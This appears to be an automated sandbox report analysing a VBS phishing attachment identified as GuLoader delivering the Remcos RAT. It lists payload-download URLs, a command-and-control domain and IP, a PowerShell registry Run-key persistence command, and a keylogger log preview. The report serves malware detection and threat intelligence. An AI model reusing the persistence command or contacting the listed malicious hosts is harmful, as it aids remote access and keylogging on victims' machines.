              NameIPActiveMaliciousAntivirus DetectionReputation
              paygateme.net
              146.70.57.34
              truefalse
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gptrue
                  • URL Reputation: phishing
                  unknown
                  http://87.121.105.184/JTcKQkcYvvHPBH210.binfalse
                    unknown
                    http://87.121.105.184/Fodgngerovergangs.prmfalse
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.imvu.comrwab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://go.micropowershell.exe, 0000000B.00000002.2085378720.000001C45D044000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.imvu.comwab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000001C.00000002.1917436309.0000000002DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://87.121.105.184powershell.exe, 0000000B.00000002.2085378720.000001C45C038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2085378720.000001C45D6CA000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://www.imvu.comppDatawab.exe, 0000001C.00000002.1917436309.0000000002DDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://www.nirsoft.netwab.exe, 0000001A.00000002.1935559415.0000000002E34000.00000004.00000010.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      unknown
                                      https://www.google.comwab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        high
                                        http://87.121.105.184/Fodgngerovergangs.prmXRpowershell.exe, 0000000F.00000002.1847892742.0000000004F1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://aka.ms/pscore6lBpowershell.exe, 0000000F.00000002.1847892742.0000000004DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://87.121.105.184/Fodgngerovergangs.prmPpowershell.exe, 0000000B.00000002.2085378720.000001C45C038000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://contoso.com/powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2227118758.000001C46BE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1850677246.0000000005E25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/accounts/serviceloginwab.exefalse
                                                  high
                                                  https://login.yahoo.com/config/loginwab.exefalse
                                                    high
                                                    https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2085378720.000001C45BE11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.nirsoft.net/wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.2085378720.000001C45BE11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1847892742.0000000004DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://87.121.Hpowershell.exe, 0000000B.00000002.2085378720.000001C45D6CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.ebuddy.comwab.exe, wab.exe, 0000001C.00000002.1914393597.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            87.121.105.184
                                                            unknownBulgaria
                                                            43561NET1-ASBGfalse
                                                            178.237.33.50
                                                            geoplugin.netNetherlands
                                                            8455ATOM86-ASATOM86NLfalse
                                                            146.70.57.34
                                                            paygateme.netUnited Kingdom
                                                            2018TENET-1ZAfalse
                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                            Analysis ID:1428130
                                                            Start date and time:2024-04-18 15:39:05 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 20s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:30
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:RFQ.NO. S70-23Q-1474-CS-P.vbs
                                                            Detection:MAL
                                                            Classification:mal100.rans.phis.troj.spyw.expl.evad.winVBS@25/320@2/3
                                                            EGA Information:
                                                            • Successful, ratio: 60%
                                                            HCA Information:
                                                            • Successful, ratio: 97%
                                                            • Number of executed functions: 152
                                                            • Number of non-executed functions: 301
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 4784 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 5768 because it is empty
                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • VT rate limit hit for: RFQ.NO. S70-23Q-1474-CS-P.vbs
                                                            TimeTypeDescription
                                                            15:40:06API Interceptor117x Sleep call for process: powershell.exe modified
                                                            16:50:08API Interceptor528x Sleep call for process: wab.exe modified
                                                            16:50:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Naergaaende %Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)
                                                            16:50:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Naergaaende %Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            87.121.105.184awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 87.121.105.184/yheFuLEFhskyHXyKesmPV163.bin
                                                            RFQ NO S70-23Q-1474-CS-P.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 87.121.105.184/yheFuLEFhskyHXyKesmPV163.bin
                                                            178.237.33.50F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                            • geoplugin.net/json.gp
                                                            F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                            • geoplugin.net/json.gp
                                                            5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • geoplugin.net/json.gp
                                                            SecuriteInfo.com.Win32.RATX-gen.12024.12837.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • geoplugin.net/json.gp
                                                            DETAILS.docx.docGet hashmaliciousRemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            Carlispa_Ordine_00401702400417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            EqcaSLpedido001417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            146.70.57.34RFQ NO- S70-23Q-147400000789975DXT-CS-P-0730RDER.bat.exeGet hashmaliciousRemcosBrowse
                                                              Payment Invoice.exeGet hashmaliciousRemcosBrowse
                                                                RFQ.NO. S70-23Q-1474-CS-P - ORDER 2024.gz.exeGet hashmaliciousRemcosBrowse
                                                                  NEW ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                    ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                      SecuriteInfo.com.Win32.PWSX-gen.19953.22926.exeGet hashmaliciousRemcosBrowse
                                                                        SecuriteInfo.com.Win32.PWSX-gen.22684.1131.exeGet hashmaliciousRemcosBrowse
                                                                          SecuriteInfo.com.Win32.PWSX-gen.20579.4557.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                            PO 803707375.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                              PRODUCT LIST-CALAMARI9804870.exeGet hashmaliciousRemcosBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                paygateme.netRFQ NO- S70-23Q-147400000789975DXT-CS-P-0730RDER.bat.exeGet hashmaliciousRemcosBrowse
                                                                                • 146.70.57.34
                                                                                RFQ.NO. S70-23Q-1474-CS-P - ORDER 2024.gz.exeGet hashmaliciousRemcosBrowse
                                                                                • 146.70.57.34
                                                                                NEW ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 146.70.57.34
                                                                                ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 146.70.57.34
                                                                                SecuriteInfo.com.Win32.PWSX-gen.19953.22926.exeGet hashmaliciousRemcosBrowse
                                                                                • 146.70.57.34
                                                                                SecuriteInfo.com.Win32.PWSX-gen.22684.1131.exeGet hashmaliciousRemcosBrowse
                                                                                • 146.70.57.34
                                                                                SecuriteInfo.com.Win32.PWSX-gen.20579.4557.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 146.70.57.34
                                                                                PO 803707375.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 146.70.57.34
                                                                                PRODUCT LIST-CALAMARI9804870.exeGet hashmaliciousRemcosBrowse
                                                                                • 146.70.57.34
                                                                                ORDER SAMPLE 2024.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                • 146.70.57.34
                                                                                geoplugin.netF873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                • 178.237.33.50
                                                                                F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                • 178.237.33.50
                                                                                5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                • 178.237.33.50
                                                                                SecuriteInfo.com.Win32.RATX-gen.12024.12837.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                • 178.237.33.50
                                                                                DETAILS.docx.docGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                Carlispa_Ordine_00401702400417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                EqcaSLpedido001417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                NET1-ASBGdoc_awb_shipping_invoice_17_04_2024_000000000000024.vbsGet hashmaliciousUnknownBrowse
                                                                                • 94.156.79.64
                                                                                awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 87.121.105.184
                                                                                NuC1l4kfI3.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                • 94.156.8.161
                                                                                LBvIphWDPb.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                • 94.156.8.161
                                                                                eQNVMc4j6K.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                • 94.156.8.161
                                                                                4eZlHd6xSJ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                • 94.156.8.161
                                                                                U7leT73t8Z.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                • 94.156.8.161
                                                                                EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 94.156.79.69
                                                                                c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exeGet hashmaliciousAmadeyBrowse
                                                                                • 93.123.39.96
                                                                                GhLMDfzXqQ.exeGet hashmaliciousAmadeyBrowse
                                                                                • 93.123.39.96
                                                                                TENET-1ZAOo2yeTdq5J.elfGet hashmaliciousMiraiBrowse
                                                                                • 155.238.136.182
                                                                                16rBksY5gH.elfGet hashmaliciousMiraiBrowse
                                                                                • 196.248.26.6
                                                                                iZYqP2K1UC.elfGet hashmaliciousMiraiBrowse
                                                                                • 155.233.139.108
                                                                                bnNLsZqj8B.elfGet hashmaliciousMiraiBrowse
                                                                                • 163.200.142.68
                                                                                zLH4Gkr36e.elfGet hashmaliciousMiraiBrowse
                                                                                • 152.106.53.93
                                                                                RFQ NO- S70-23Q-147400000789975DXT-CS-P-0730RDER.bat.exeGet hashmaliciousRemcosBrowse
                                                                                • 146.70.57.34
                                                                                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                • 146.69.137.49
                                                                                Payment Invoice.exeGet hashmaliciousRemcosBrowse
                                                                                • 146.70.57.34
                                                                                4fjy5gB1w6.elfGet hashmaliciousMiraiBrowse
                                                                                • 146.232.38.17
                                                                                6H5iAAbeiB.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                • 152.106.28.32
                                                                                ATOM86-ASATOM86NLF873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                • 178.237.33.50
                                                                                F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                • 178.237.33.50
                                                                                5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                • 178.237.33.50
                                                                                SecuriteInfo.com.Win32.RATX-gen.12024.12837.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                • 178.237.33.50
                                                                                DETAILS.docx.docGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                Carlispa_Ordine_00401702400417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                EqcaSLpedido001417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                • 178.237.33.50
                                                                                No context
                                                                                No context
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):288
                                                                                Entropy (8bit):3.3291061944035305
                                                                                Encrypted:false
                                                                                SSDEEP:6:6l+7N55YcIeeDAlOWAAe5q1gWAAe5q1gWAv:6l4Nhec0WFe5BWFe5BW+
                                                                                MD5:91ED5F30B051CC164E9B9E341CBFB3CE
                                                                                SHA1:8245D3D7EC337CFA9691B7318808AE0E60C2C2A8
                                                                                SHA-256:A282146E1503442132545B0434D491D2C269DCFCC4D0EE02F0E571EE01D0F9F2
                                                                                SHA-512:E981372B04BE9CA2DC5E54FDECE8EB8F7AB71F8E0E13EF6D30B15F1E4537A1F26150F08F30C7D89AA8DE200DCD1B2CDC2E11C1CB72665C50A55DA5F6918BCF9D
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                Preview:....[.2.0.2.4./.0.4./.1.8. .1.6.:.5.0.:.0.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):963
                                                                                Entropy (8bit):4.995921748950886
                                                                                Encrypted:false
                                                                                SSDEEP:12:tklzTknd6UGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7R+2:qlkdVauKyGX855vXhNlT3/77Kdxtro
                                                                                MD5:57C36A4D45733B4304D0ED59EDA89921
                                                                                SHA1:D304B73EE632B7839808A761FDC19CD23280D62E
                                                                                SHA-256:C6C00D5FC9257C069D61A76B5C8C8762F9EE120F8C7BBFC157D3169C24D95F8F
                                                                                SHA-512:1DE275B4992B9EB368BF0DA068812FC43E30FAEAC2CFCD0BF5DFF823479D6B3758D5F74078123DA46A0671F217FB2BE5D53D79A641D7BE6DB9ECEAE6F0F4FDC7
                                                                                Malicious:false
                                                                                Preview:{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):11608
                                                                                Entropy (8bit):4.886255615007755
                                                                                Encrypted:false
                                                                                SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                                MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                                SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                                SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                                SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                                Malicious:false
                                                                                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1940658735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlllulbnolz:NllUc
                                                                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                Malicious:false
                                                                                Preview:@...e................................................@..........
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa59b1530, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):14680064
                                                                                Entropy (8bit):0.9810631727826041
                                                                                Encrypted:false
                                                                                SSDEEP:6144:YgMnQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SUqGxJH/:5n/cj5tN95ApxK4K
                                                                                MD5:016868CDAD135B3272D1C98C0CAA85FC
                                                                                SHA1:2BD919D62CEC345833B378BB93D4E97672E6C82F
                                                                                SHA-256:9EC28D6E5A51D2900F1C30D2592C7C13BDAB6C7B428A0F21AF475796FF286E82
                                                                                SHA-512:B78BCE62E795EB69830CD9045157BD141B993AA109486C7C87C75E044B86FC4C48529C76FD85A6806FCCAB61AFAF85D9B2D15203FF3CE09B062F23B4A05EE680
                                                                                Malicious:false
                                                                                Preview:...0... ................./..(...{........................&......6...{a..(...|Q.h.(.........................:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... .......93...{a..............................................................................................................................................................................................(...{...................................F.I.(...|o..................$q..(...|Q..........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                Category:modified
                                                                                Size (bytes):2
                                                                                Entropy (8bit):1.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:Qn:Qn
                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                Malicious:false
                                                                                Preview:..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):147491
                                                                                Entropy (8bit):7.998675939065718
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FDQxt5RgLC93keX:ZIc0afzkI9WaXNMyQH3bNxAj/5FDQ/IM
                                                                                MD5:C58B2486DB6311F906DCE8778423C610
                                                                                SHA1:6F095BE2A8C5CE293DD6E9CC3A14BFD282E93D6D
